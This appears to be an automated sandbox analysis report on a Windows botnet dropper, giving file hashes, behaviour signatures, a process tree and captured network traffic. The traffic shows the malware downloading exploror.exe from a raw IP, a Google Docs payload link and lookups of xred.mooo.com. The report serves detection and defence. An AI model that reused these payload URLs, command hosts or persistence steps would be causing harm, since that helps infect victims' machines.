Analysis

  • max time kernel
    161s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2023, 08:32 UTC

General

  • Target

    1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

  • Size

    362KB

  • MD5

    99be0e637186d469b647525e9275ccfc

  • SHA1

    83a797037fd4c10f1248387395cc039aa9f3c71b

  • SHA256

    1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180

  • SHA512

    1477f8db399c74174379ff881f6dcd9148bf57ff29839c466259d4c17235254e66cfd0410e5d0d79304a1a4f8352910d64a4f1446f7ed9cd5ceccd285ed265d5

  • SSDEEP

    3072:N8jSZi34eTzl5KV2GenT0cTtm2LAQSXVqjzpYfJhrI:quZ5eg2GenQ67wk3pyJhrI

Malware Config

Signatures

  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

  • Chinese Botnet payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
    "C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4844
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c md C:\windowss64
      2⤵
        PID:4644
      • C:\windowss64\computer.exe
        "C:\windowss64\computer.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Adds Run key to start application
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe
          "C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Enumerates connected drives
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1532
        • C:\ProgramData\Synaptics\Synaptics.exe
          "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
          3⤵
          • Executes dropped EXE
          PID:3208

    Network

    • flag-unknown
      GET
      http://47.93.60.63:8000/exploror.exe
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      Remote address:
      47.93.60.63:8000
      Request
      GET /exploror.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 47.93.60.63:8000
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: application/octet-stream
      Content-Length: 1181696
      Accept-Ranges: bytes
      Server: HFS 2.3i
      Set-Cookie: HFS_SID_=0.888800468761474; path=/; HttpOnly
      Last-Modified: Thu, 03 Nov 2022 07:49:44 GMT
      Content-Disposition: attachment; filename="exploror.exe";
    • flag-unknown
      DNS
      164.2.77.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      164.2.77.40.in-addr.arpa
      IN PTR
      Response
    • flag-unknown
      DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • flag-unknown
      DNS
      freedns.afraid.org
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      freedns.afraid.org
      IN A
      Response
      freedns.afraid.org
      IN A
      69.42.215.252
    • flag-unknown
      GET
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Synaptics.exe
      Remote address:
      69.42.215.252:80
      Request
      GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
      User-Agent: MyApp
      Host: freedns.afraid.org
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 16 Jan 2023 08:34:33 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Cache: MISS
    • flag-unknown
      DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • flag-unknown
      DNS
      docs.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      docs.google.com
      IN A
      Response
      docs.google.com
      IN A
      142.250.179.174
    • flag-unknown
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.174:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Mon, 16 Jan 2023 08:35:56 GMT
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-Yj0LQAF4eiOfGvfClVnOlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Server: ESF
      X-XSS-Protection: 0
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
      Accept-Ranges: none
      Vary: Accept-Encoding
      Transfer-Encoding: chunked
    • flag-unknown
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.174:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Mon, 16 Jan 2023 08:35:56 GMT
      Strict-Transport-Security: max-age=31536000
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
      Cross-Origin-Opener-Policy: same-origin
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-lHhuxh-tbU6C648SFvIIlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Server: ESF
      X-XSS-Protection: 0
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
      Accept-Ranges: none
      Vary: Accept-Encoding
      Transfer-Encoding: chunked
    • 93.184.220.29:80
      46 B
      40 B
      1
      1
    • 93.184.220.29:80
      40 B
      1
    • 93.184.220.29:80
      46 B
      40 B
      1
      1
    • 20.23.71.251:443
      tls
      138 B
      183 B
      3
      3
    • 20.23.71.251:443
      tls
      138 B
      183 B
      3
      3
    • 47.93.60.63:8000
      http://47.93.60.63:8000/exploror.exe
      http
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      72.9kB
      1.2MB
      1521
      1517

      HTTP Request

      GET http://47.93.60.63:8000/exploror.exe

      HTTP Response

      200
    • 93.184.220.29:80
      322 B
      7
    • 93.184.221.240:80
      322 B
      7
    • 20.189.173.13:443
      322 B
      7
    • 87.248.202.1:80
      322 B
      7
    • 87.248.202.1:80
      322 B
      7
    • 87.248.202.1:80
      322 B
      7
    • 93.184.220.29:80
      260 B
      5
    • 106.52.15.123:80
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      260 B
      5
    • 106.52.15.123:80
      ._cache_computer.exe
      260 B
      5
    • 69.42.215.252:80
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      http
      Synaptics.exe
      430 B
      455 B
      6
      5

      HTTP Request

      GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

      HTTP Response

      200
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      260 B
      5
    • 47.93.60.63:80
      ._cache_computer.exe
      260 B
      5
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      260 B
      5
    • 47.93.60.63:80
      http
      ._cache_computer.exe
      920 B
      256 B
      7
      6
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      260 B
      5
    • 142.250.179.174:443
      docs.google.com
      Synaptics.exe
      260 B
      5
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      260 B
      5
    • 142.250.179.174:443
      docs.google.com
      tls
      Synaptics.exe
      412 B
      172 B
      5
      4
    • 142.250.179.174:443
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      1.5kB
      13.8kB
      20
      18

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      208 B
      4
    • 8.8.8.8:53
      164.2.77.40.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      164.2.77.40.in-addr.arpa

    • 8.8.8.8:53
      xred.mooo.com
      dns
      Synaptics.exe
      59 B
      118 B
      1
      1

      DNS Request

      xred.mooo.com

    • 8.8.8.8:53
      freedns.afraid.org
      dns
      Synaptics.exe
      64 B
      80 B
      1
      1

      DNS Request

      freedns.afraid.org

      DNS Response

      69.42.215.252

    • 224.0.0.251:5353
      114 B
      2
    • 8.8.8.8:53
      xred.mooo.com
      dns
      Synaptics.exe
      59 B
      118 B
      1
      1

      DNS Request

      xred.mooo.com

    • 8.8.8.8:53
      docs.google.com
      dns
      Synaptics.exe
      61 B
      77 B
      1
      1

      DNS Request

      docs.google.com

      DNS Response

      142.250.179.174

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe

      Filesize

      754KB

      MD5

      310a7ff41f6633132e6c2bc25e51e567

      SHA1

      5f687df8cc3185ed68d77d0e05502c2eb308c5c8

      SHA256

      d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab

      SHA512

      ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980

    • C:\ProgramData\Synaptics\Synaptics.exe

      Filesize

      754KB

      MD5

      310a7ff41f6633132e6c2bc25e51e567

      SHA1

      5f687df8cc3185ed68d77d0e05502c2eb308c5c8

      SHA256

      d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab

      SHA512

      ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980

    • C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe

      Filesize

      400KB

      MD5

      20beeb0a82adcce3a58372804acc46be

      SHA1

      c579d9017d2c8298fe075ff5c05963901330e72a

      SHA256

      d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e

      SHA512

      7636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd

    • C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe

      Filesize

      400KB

      MD5

      20beeb0a82adcce3a58372804acc46be

      SHA1

      c579d9017d2c8298fe075ff5c05963901330e72a

      SHA256

      d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e

      SHA512

      7636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd

    • C:\windowss64\computer.exe

      Filesize

      1.1MB

      MD5

      be689578752179e22bf915dbcf4f7520

      SHA1

      e798e703bfb90707a2872b51da73f32af566aedb

      SHA256

      de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e

      SHA512

      89c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8

    • C:\windowss64\computer.exe

      Filesize

      1.1MB

      MD5

      be689578752179e22bf915dbcf4f7520

      SHA1

      e798e703bfb90707a2872b51da73f32af566aedb

      SHA256

      de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e

      SHA512

      89c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8

    • memory/1532-145-0x0000000010000000-0x0000000010018000-memory.dmp

      Filesize

      96KB

    • memory/4844-136-0x0000000010000000-0x0000000010018000-memory.dmp

      Filesize

      96KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.